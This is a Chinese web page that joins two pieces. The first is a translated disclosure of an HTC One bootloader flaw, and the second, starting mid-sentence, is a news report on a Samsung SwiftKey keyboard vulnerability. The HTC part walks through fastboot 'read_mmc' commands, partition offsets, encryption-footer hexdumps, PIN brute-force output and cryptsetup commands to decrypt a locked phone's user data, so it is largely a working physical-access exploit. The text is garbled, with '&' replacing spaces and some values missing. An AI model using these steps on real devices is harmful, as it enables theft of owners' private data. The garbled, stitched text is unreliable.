利用HTC One漏洞破解手机PIN密码
HTC One手机运行的是Android 4.2.2、HBOOT 1.54.0000，它存在一个名为Bootloader的。这个漏洞早在2014年2月份就报告给了HTC官方，并在次月就修复了该漏洞。在得到HTC官方同意后，我们现在就将整个漏洞利用测试过程发布出来。
read_emmc命令在2011发布的HTC DesireZ手机中也曾出现过。这个命令允许攻击者访问手机内存，并可能获取短信、联系人等敏感信息。
此外，这条命令允许攻击者通过bruteforce自动获取手机PIN/passcode。他会打开一个额外的缺口防止用户定义易猜解的PIN/passcode(比如说就4个数字的PIN)。这是常有的事情，因为日常解锁手机也是可以使用PIN/passcode的。
这个攻击仅限于HTC One手机且还得开启全盘加密，也就是说手机由安卓加密保护。
read_emmc命令在部分HTC手机中似乎是一个用来调试的命令。在我们看来，这条命令不应该出现在用户手机上。
这描述了HTC One在安卓全盘加密上的强悍安全机制(AES加密, 合理的密钥长度, salt)&。
将HTC One关机然后插入电脑，然后进入fastboot模式（关机状态按住音量+键以及开机键，然后放开开机键），这样我们可以从HBOOT进入fastboot模式。
到了这里，我们就可以利用fastboot进行读取内存操作了，命令如下：
commandformat:&read_mmc&[emmc/sd]&[start]&[#blocks]&[#blocks/read]&[show]
我们来看看参数的定义：
第一个参数，告诉机器从哪里读取。&emmc&是读取闪存，&sd&是读取内存卡
#blocks: 读取块的数量
#blocks/read:一次读取块的数量
show:设置成1来显示结果
读取第一个扇区，可以使用如下命令
$fastboot&oem&read_mmc&emmc&0&1&1&1...(bootloader)&reading&sector&0&~&0(bootloader)&0...(bootloader)&0(bootloader)&DF(bootloader)&FF(bootloader)&3(bootloader)&0(bootloader)&20(bootloader)&E0(bootloader)&9F(bootloader)&3(bootloader)&55(bootloader)&AA(bootloader)&read&sector&done&average&=&172OKAY&[&&0.310s]finished.&total&time:&0.311s
从头开始看，我们可以看到许多的0（超过400字节），其结尾是&55 AA&&。
在手机上使用ADB Shell，我们可以看到用户的数据分区块&mmcblk0p37&是从6422528开始的。在安卓下它与挂载的ext4分区对应
#cat&/proc/emmcdev:&&&&&&&&size&&&&&erasesize&name...mmcblk0p37:&000200&&userdata&:#&cat&:#&mount.../dev/block/mmcblk0p37&/data&ext4&rw,nosuid,nodev,noatime,discard,noauto_da_alloc,data=ordered&0&0
因此，攻击者可以使用&read_mmc&&命令，在闪存中浏览用户数据分区中的内容，即使用户设定了PIN/密码都无法阻止。
$fastboot&oem&read_mmc&emmc&&1&1...(bootloader)&reading&sector&6422530&~&6422530(bootloader)&0...(bootloader)&2F(bootloader)&64(bootloader)&61(bootloader)&74(bootloader)&61...(bootloader)&read&sector&done&average&=&146OKAY&[&&0.359s]finished.&total&time:&0.359s
&2F 64 61 74 61&字节序列是位于用户数据分区开始的&/data& ASCII字符串。
我们的第一个想法就是实现从闪存将用户数据进行转储，然而这个过程需要几天甚至是几个月时间。
另一个想法是利用FUSE(用户空间的文件系统)通过USB连接电脑转储用户数据。
绕过安卓全盘加密（PDE）
在HTC Desire Z（ Android 2.x）时代还没有出现全盘加密，我们现在考虑是否有办法绕过PDE，使用&read_mmc&漏洞。
ThomasCannon在2012年Defcon大会上向我们演示了PDE工作过程，使用&bruteforcePIN/passcode以及解密用户扇区数据的脚本。在那个时候，他使用的是Google Nexus S纯原生，与这里这个例子稍有不同。
我们决定对设备进行，&存储&手机存储加密&。通过其方法，我们注意到出现了一个额外的分区，这个分区就是用来存储密钥的。
$hexdump&-C&extra&&&c4&b1&b5&d0&01&00&00&00&&68&00&00&00&00&00&00&00&|........h.......|&00&00&00&00&00&00&00&&00&00&40&03&00&00&00&00&&|.........@.....|&00&00&00&61&65&73&2d&&63&62&63&2d&65&73&73&69&|....aes-cbc-essi|&3a&73&68&61&32&35&36&&00&00&00&00&00&00&00&00&|v:sha256........|&00&00&00&00&00&00&00&&00&00&00&00&00&00&00&00&|................|*&00&00&00&00&00&00&00&{15&d2&9c&16&1c&54&40&1c&|.............T@.|&&b4&c1&e4&91&69&10&4b&55&&2e&47&64&31&13&52&ad&2d&|....i.KU.Gd1.R.-|&&bd&8c&42&8e&d6&c4&84&00}&00&00&00&00&00&00&00&00&|..B.............|&00&00&00&00&00&00&00&&00&00&00&00&00&00&00&00&|................|&&00&00&00&00&00&00&00&00&[c7&1f&34&80&97&09&fd&39&|..........4....9|&&0b&4a&91&d9&d9&d8&00&cd]&00&00&00&00&00&00&00&00&|.J..............|&&00&00&00&00&00&00&00&00&&00&00&00&00&00&00&00&00&|................|*
Note: 对主密钥及内部数据解密，推荐大家看看Thomas的幻灯片。
我们正好处于加密头的位置，于是我可以很快得到
#cat&/proc/emmcdev:&&&&&&&&size&&&&&erasesize&name...mmcblk0p27:&00200&&extra&:#&cat&/sys/block/mmcblk0/mmcblk0p27/start586799
然后，我们可以再次确认用户数据分区被加密。第一个字节告诉我们，&This is an encrypted device:)&，这仅仅是在HTC One中才有的。他之所以能这么写，是因为在默认的ext4分区中第一个字节并没有使用，其他字节都是随机字节。
:#./busybox&hexdump&-C&/dev/block/mmcblk0p37&-n&&&54&68&69&73&20&69&73&20&&61&6e&20&65&6e&63&72&79&|This&is&an&encry|&74&65&64&20&64&65&76&&69&63&65&3a&29&6f&c3&a0&|pted&device:)o..|&bc&76&ed&a8&77&ef&6a&&95&28&32&ab&24&ce&8d&58&|&.v..w.j.(2.$..X|&fe&8e&14&9e&81&05&a4&&28&65&64&3c&1b&e2&11&56&|........(ed&...V|
接着，我们可以确定能够访问这个头，使用fastboot 中&read_mmc&&命令对用户数据分区进行加密
$fastboot&oem&read_mmc&emmc&&1&1
由此，我们可以编写一个小脚本来读取PDE头，用户数据分区的第一个扇区然后通过电脑进行破解。
#python&bruteforce_htcone_over_reademmc.pyoem&read_mmc&emmc&&1&1oem&read_mmc&emmc&&1&1Footer&File&&&&:&extraMagic&&&&&&&&&&:&0xD0B5B1C4Major&Version&&:&1Minor&Version&&:&0Footer&Size&&&&:&104&bytesFlags&&&&&&&&&&:&0xKey&Size&&&&&&&:&256&bitsFailed&Decrypts:&0Crypto&Type&&&&:&aes-cbc-essiv:sha256Encrypted&Key&&:0x15D29C161C5EEAD2DBD8C428ED6C48400Salt&&&&&&&&&&&:&0xC71F0B4A91D9D9D800CD----------------Trying&to&Bruteforce&Password...&please&waitFound&PIN!:&0000Saving&decrypted&master&key&to&'keyfile'
挂载用户数据加密分区
攻击者可以通过上文轻松获取PIN/passcode，他能正常接通电话，重写或者创建PIN/passcode，然后开启ADB，做他想做的任何事。
#mkdir&mnt#&losetup&/dev/loop0&userdata.img#&cryptsetup&&type&plain&open&&c&aes-cbc-essiv:sha256&&d&keyfile&/dev/loop0userdata#&mount&/dev/mapper/userdata&mnt
在这个例子上，我们甚至可以通过USB在电脑上执行&read_mmc& 命令。三星手机被曝存安全漏洞 可被黑客利用控制手机
来源：法制晚报
　　据美国有线电视新闻网（CNN）日前报道，美国网络安全公司NowSecure发布最新报告称，三星手机的键盘应用存在漏洞，用户的大量信息可能因此被泄露。而这一漏洞，在大量三星的移动设备中暂时未得到修复，其中包括最新款的Galaxy S6等，波及全球超6亿用户。
　　NowSecure发言人艾森?拉塞尔在接受《法制晚报》记者采访时表示，三星手机存在的漏洞可能被黑客利用，窃取用户通讯录、短信、照片等重要信息。
　　对此，三星公司予以回应称，三星在今年3月就为该漏洞提供了补丁，但运营商可能没有及时推送，三星在未来数天内还会推出修复措施。
　　漏洞曝光 三星手机键盘程序可被黑客利用控制手机
　　SwiftKey是一款键盘应用，预装在多款三星手机上，也可以通过谷歌和苹果的应用商店下载。美国安全公司NowSecure的报告称，它可以允许远程攻击者控制用户的网络流量，并在手机上执行任意代码。该软件是无法被卸载的，即使SwiftKey没有被设置为默认键盘，攻击者依然可以利用该漏洞。
　　SwiftKey在手机当中拥有很高的权限，可获取当中的大部分功能。通过利用这一漏洞，攻击者几乎获得了完全控制权，让他们可以在设备上进行任何操作，比如秘密安装恶意软件，使用设备的摄像头、麦克风和GPS，窃听通话、更改其他应用，甚至是窃取照片和短信。
　　NowSecure表示，他们在去年12月就已经将该漏洞通报给三星、美国计算机应急响应小组和谷歌的Android团队。
　　三星虽然在今年年初向运营商提供了修复补丁，但是目前并不清楚手机的运营商是否为用户的设备进行了修复。由于三星手机的型号以及全球运营商网络数量等因素，并不确定到底有多少手机用户仍然处于易被攻击的状态。
　　报道称，让人担忧的是，本次曝光的漏洞波及范围非常之大，所影响的设备数量超过了6亿，包括三星Galaxy S6、S5、S4和S4 mini 在内的机型，以及Verizon、AT&T、Sprint 和T-Mobile 等运营商版本都无一幸免。
　　根据NowSecure的建议，用户目前最好避免使用不安全的Wi-Fi网络，或是暂时更换其他品牌的移动设备。
　　记者追访报告发布公司：三星漏洞为“严重错误”
　　发布此次安全报告的NowSecure公司发言人艾森?拉塞尔接受法晚记者采访时表示，SwiftKey这一内置应用程序不仅仅只有三星手机采用，但是NowSecure发现的是针对三星在手机安装上出现的问题。
　　对于三星的提供补丁的及时性，拉塞尔告诉记者，一般而言提供制造商提供修复补丁的时间长短不一。大体而言，手机的原设备制造商以及运营商需要为用户更快地提供修复补丁，特别是像三星手机此次遭遇的这样敏感的问题。而更为重要的一点是，在三星发布手机之前，需要更有效地测试其加载的应用程序，避免这样的问题发生。
　　拉塞尔表示，这些问题的发生就是因为开发商以及手机的原设备制造商在他们正式发布手机之前，在开发和测试应用程序上并没有遵守行业内最佳的准则。
　　拉塞尔进一步指出，我们将三星此次的漏洞归类为“严重错误”。具体而言，在行业的公开标准、“通用漏洞评分系统”中被评为8.3分（10分为严重等级的最高分）。之所以被归类为严重错误，是因为用户无法通过升级或是自己的操作来解决该问题，只能通过运营商提供的补丁才能修复。
　　半年前已告知三星漏洞至今未得到修复
　　NowSecure 公司研究人员安德鲁告诉法晚记者，该公司去年就已经把该漏洞告知了三星公司，但半年多过去了，漏洞依然没有得到修复。这就是NowSecure 为何会选择现在公开这个调查结果的原因。
　　NowSecure测试了几款不同的三星Galaxy 手机，结果显示，这些手机都容易受到攻击。这个问题涉及三星设备所使用的单词预测软件，由英国科技公司SwiftKey研发，三星手机都安装了该软件。三星没有对键盘更新进行加密。去年，我们发现三星手机用户在软件更新时，可能会接收恶意文件，病毒可以访问某些手机系统最核心的部件。
　　黑客可以利用这个漏洞欺骗键盘的代理服务系统，从而操控手机的传感器和应用，甚至还能秘密安装恶意软件。黑客还可以劫持三星安卓系统智能手机内置键盘的更新过程，进而窃听用户的通话，查看短信和联系人，或打开麦克风录音。也就是说，黑客可以在你的手机上做任何事情。
　　三星回应 重视新安全威胁近期将推送安全补丁
　　三星电子中国区弘报（宣传）部门负责人陈曦在接受《法制晚报》记者采访时表示，“报道中提到的三星手机存在漏洞这一消息，我们已经知晓，但具体技术问题还要交给公司相关人员处理。”
　　三星电子在一份声明中表示，他们“非常重视新出现的安全威胁，并致力于提供最新的移动安全性，我们在过去的一周充分了解了问题的严重程度”，将通过三星的Knox服务修补问题，并称：“更新将在几天内推出”。该公司表示，目前还不清楚是否所有受影响的手机都能得到修复。
　　三星公司称，去年11月就发现了这一漏洞，今年3月为移动运营商提供了补丁。但一些运营商可能没有及时推送这一补丁，即便是运营商及时推送，也会有一些用户不愿意及时更新。
　　三星公司还表示，这个漏洞的风险被夸大，如果黑客要利用这一漏洞执行恶意代码，他们必须和三星手机在同一个未加密的网络中，而且即便黑客执行了恶意代码，也能被三星的安全软件拦截。他们未来数天将向所有三星移动设备推送安全补丁。
　　SwiftKey：该漏洞不容易被利用
　　英国科技公司SwiftKey在一份公开声明中表示，他们已经发现了该缺陷。这是把该键盘集成到三星手机的方式和技术产生的安全漏洞。
　　SwiftKey同时表示，这个漏洞并不容易被利用，黑客只能在键盘软件更新时潜入手机。
　　专家解读 用户尽量在安全网络中操作手机
　　美国信息技术研究和分析公司“加纳公司”的手机安全研究主管迪奥尼西奥?苏墨勒接受法晚记者采访时表示，SwiftKey 是一种手机键盘的应用程序。在三星的例子里，SwiftKey以一些特定的特权运行，这使得漏洞利用成为可能。
　　如果这一漏洞被攻击者蓄意利用的话，将会对手机用户造成很大的安全威胁。通过利用这一漏洞，攻击者几乎获得了完全控制权，让他们可以在设备上进行任何操作。
　　苏墨勒告诉记者，要利用漏洞进行攻击，攻击者必须通过互联网的第三人，也就是“中间人”进行攻击，这将攻击范围变得最小化。三星的手机用户应该尽量在安全的网络进行操作（例如在家中的网络）。
　　此外，手机安全管理应用程序例如Skycure，同样能够检查到发动中间攻击的攻击者，避免手机遭到攻击。
　　如果用户是企业用户，管理者可以通过移动管理工具来拦截SwiftKey 应用程序。
　　本版文/记者黎史翔张洁清
(责任编辑：UN654)
&&&&&&</div
数字之道：
独家策划：
社区热帖推荐
疑因过度穿着束腰带患肾病……[]
客服热线：86-10-
客服邮箱：}